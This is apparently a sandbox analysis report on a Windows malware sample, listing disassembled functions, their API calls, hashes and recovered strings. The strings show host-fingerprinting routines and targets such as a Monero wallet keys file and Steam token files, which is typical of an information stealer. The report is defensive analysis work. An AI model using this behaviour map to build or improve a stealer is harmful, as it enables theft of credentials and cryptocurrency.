
Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: b4df3017cd6aa84ec16b061b742a4fb279b486c108768c0b5d085b24d01cb2f9
Instruction ID: c92231da9d2a1f1cab3e7f1561d32108cf9ccb2d4b4a4f8f3c2230e088d00533
Opcode Fuzzy Hash: b4df3017cd6aa84ec16b061b742a4fb279b486c108768c0b5d085b24d01cb2f9
Instruction Fuzzy Hash: F0815575A101089FDB1CEF68D995AEEB7B5FF95300F508519E80ADB641DB30AA06CB83

Function 008A9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 008A9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008A94A5
CloseHandle.KERNEL32(00000000), ref: 008A94AF

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 53f4eee12837be9f11ef017f312a7ab29120409e49d443a704d238b2e067dc6e
Instruction ID: 2133322831475e2e272a6262bebe11997bb792facb167b28d6f9aa43764d3caf
Opcode Fuzzy Hash: 53f4eee12837be9f11ef017f312a7ab29120409e49d443a704d238b2e067dc6e
Instruction Fuzzy Hash: A2F03A7490120CABEB04DFA4DC4AFEE7778FB08700F004498BA1A97290D6B06A86DB91

Function 00891110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0089112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00891132
ExitProcess.KERNEL32 ref: 00891143

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 99630494009c37d6b59311cc97e41ee7eedb4af09021b95b7a084d162028dc6e
Instruction ID: 0aed2e4871a74be2d30bc8b0708f19297b913e3351460bc89bf8a9ada5f7989d
Opcode Fuzzy Hash: 99630494009c37d6b59311cc97e41ee7eedb4af09021b95b7a084d162028dc6e
Instruction Fuzzy Hash: 02E0E67094A348FFEF10ABE59C0EB0D77B8EB14B01F104055F709B61D0D6B52641969A

Function 008A1A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008A7542
Part of subcall function 008A7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008A757F
Part of subcall function 008A7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7603
Part of subcall function 008A7500: RtlAllocateHeap.NTDLL(00000000), ref: 008A760A

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008A7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A76A4
Part of subcall function 008A7690: RtlAllocateHeap.NTDLL(00000000), ref: 008A76AB

Part of subcall function 008A77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,008ADBC0,000000FF,?,008A1C99,00000000,?,0142DB00,00000000,?), ref: 008A77F2
Part of subcall function 008A77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,008ADBC0,000000FF,?,008A1C99,00000000,?,0142DB00,00000000,?), ref: 008A77F9

Part of subcall function 008A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008911B7), ref: 008A7880
Part of subcall function 008A7850: RtlAllocateHeap.NTDLL(00000000), ref: 008A7887
Part of subcall function 008A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008A789F

Part of subcall function 008A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7910
Part of subcall function 008A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008A7917
Part of subcall function 008A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008A792F

Part of subcall function 008A7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008B0E00,00000000,?), ref: 008A79B0
Part of subcall function 008A7980: RtlAllocateHeap.NTDLL(00000000), ref: 008A79B7
Part of subcall function 008A7980: GetLocalTime.KERNEL32(?,?,?,?,?,008B0E00,00000000,?), ref: 008A79C4
Part of subcall function 008A7980: wsprintfA.USER32 ref: 008A79F3

Part of subcall function 008A7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0142DEA0,00000000,?,008B0E10,00000000,?,00000000,00000000), ref: 008A7A63
Part of subcall function 008A7A30: RtlAllocateHeap.NTDLL(00000000), ref: 008A7A6A
Part of subcall function 008A7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0142DEA0,00000000,?,008B0E10,00000000,?,00000000,00000000,?), ref: 008A7A7D

Part of subcall function 008A7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0142DEA0,00000000,?,008B0E10,00000000,?,00000000,00000000), ref: 008A7B35

Part of subcall function 008A7B90: GetKeyboardLayoutList.USER32(00000000,00000000,008B05AF), ref: 008A7BE1
Part of subcall function 008A7B90: LocalAlloc.KERNEL32(00000040,?), ref: 008A7BF9
Part of subcall function 008A7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 008A7C0D
Part of subcall function 008A7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008A7C62
Part of subcall function 008A7B90: LocalFree.KERNEL32(00000000), ref: 008A7D22

Part of subcall function 008A7D80: GetSystemPowerStatus.KERNEL32(?), ref: 008A7DAD

GetCurrentProcessId.KERNEL32(00000000,?,0142DB20,00000000,?,008B0E24,00000000,?,00000000,00000000,?,0142DED0,00000000,?,008B0E20,00000000), ref: 008A207E

Part of subcall function 008A9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 008A9484
Part of subcall function 008A9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008A94A5
Part of subcall function 008A9470: CloseHandle.KERNEL32(00000000), ref: 008A94AF

Part of subcall function 008A7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7E37
Part of subcall function 008A7E00: RtlAllocateHeap.NTDLL(00000000), ref: 008A7E3E
Part of subcall function 008A7E00: RegOpenKeyExA.KERNEL32(80000002,0141BFD8,00000000,00020119,?), ref: 008A7E5E
Part of subcall function 008A7E00: RegQueryValueExA.KERNEL32(?,0142DB80,00000000,00000000,000000FF,000000FF), ref: 008A7E7F
Part of subcall function 008A7E00: RegCloseKey.ADVAPI32(?), ref: 008A7E92

Part of subcall function 008A7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 008A7FC9
Part of subcall function 008A7F60: GetLastError.KERNEL32 ref: 008A7FD8

Part of subcall function 008A7ED0: GetSystemInfo.KERNEL32(008B0E2C), ref: 008A7F00
Part of subcall function 008A7ED0: wsprintfA.USER32 ref: 008A7F16

Part of subcall function 008A8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0142DF18,00000000,?,008B0E2C,00000000,?,00000000), ref: 008A8130
Part of subcall function 008A8100: RtlAllocateHeap.NTDLL(00000000), ref: 008A8137
Part of subcall function 008A8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008A8158
Part of subcall function 008A8100: wsprintfA.USER32 ref: 008A81AC

Part of subcall function 008A87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008B0E28,00000000,?), ref: 008A882F
Part of subcall function 008A87C0: RtlAllocateHeap.NTDLL(00000000), ref: 008A8836
Part of subcall function 008A87C0: wsprintfA.USER32 ref: 008A8850

Part of subcall function 008A8320: RegOpenKeyExA.KERNEL32(00000000,0142B648,00000000,00020019,00000000,008B05B6), ref: 008A83A4

Part of subcall function 008A8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008A8426
Part of subcall function 008A8320: wsprintfA.USER32 ref: 008A8459
Part of subcall function 008A8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 008A847B
Part of subcall function 008A8320: RegCloseKey.ADVAPI32(00000000), ref: 008A848C
Part of subcall function 008A8320: RegCloseKey.ADVAPI32(00000000), ref: 008A8499

Part of subcall function 008A8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008B05B7), ref: 008A86CA
Part of subcall function 008A8680: Process32First.KERNEL32(?,00000128), ref: 008A86DE
Part of subcall function 008A8680: Process32Next.KERNEL32(?,00000128), ref: 008A86F3
Part of subcall function 008A8680: CloseHandle.KERNEL32(?), ref: 008A8761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008A265B

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 60318822-0
Opcode ID: 48ce5d9b50a1541350c1b138b0eb465f9d033dec770f0e3927a1ea510f10c24f
Instruction ID: 69fe49d9b3f408494ee22e833b913882386d033a0f91257ac03049980d7adb32
Opcode Fuzzy Hash: 48ce5d9b50a1541350c1b138b0eb465f9d033dec770f0e3927a1ea510f10c24f
Instruction Fuzzy Hash: AB726D71810018AAEB5DFB94DC92DEE7338FF15300F5582A9B517A2C51EF342B49CA67

Function 00896D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e93c71b1b9b74f8e49a867b0c0d624ea050c167856bd49c179e821e2d0a88e0b
Instruction ID: 3f31211ff74f0f5b50cb47dd51076bca79a7c19f0fd3ba2d30ef42578cbe1e06
Opcode Fuzzy Hash: e93c71b1b9b74f8e49a867b0c0d624ea050c167856bd49c179e821e2d0a88e0b
Instruction Fuzzy Hash: 7961F7B4900219DBCF14EF94D944BEEB7B0FB04304F188599E419A7280E775AEA4DF91

Function 008A70D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 008A718C

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-4138519520
Opcode ID: 55f05eb93c53ffb46f53c00bfb28bf235f525c216549d1fbd6284ecf62466f9f
Instruction ID: 9dcdf4d03bb1adfbc51765158ad2c801077e660c69188d87af1126bc69bb4103
Opcode Fuzzy Hash: 55f05eb93c53ffb46f53c00bfb28bf235f525c216549d1fbd6284ecf62466f9f
Instruction Fuzzy Hash: E1518DB0D042189BEB24EB94DC85BEEB3B4FF45304F1441A8E216F6681EB746E88DF55

Function 008A5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA820: lstrlen.KERNEL32(00894F05,?,?,00894F05,008B0DDE), ref: 008AA82B
Part of subcall function 008AA820: lstrcpy.KERNEL32(008B0DDE,00000000), ref: 008AA885

lstrlen.KERNEL32(00000000,00000000,008B0ACA), ref: 008A512A

Strings

steam_tokens.txt, xrefs: 008A513F

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 642a2b18463b17687ee066117ac7a2923277d87c4c6d2c7d626dd4cc9a4b50e8
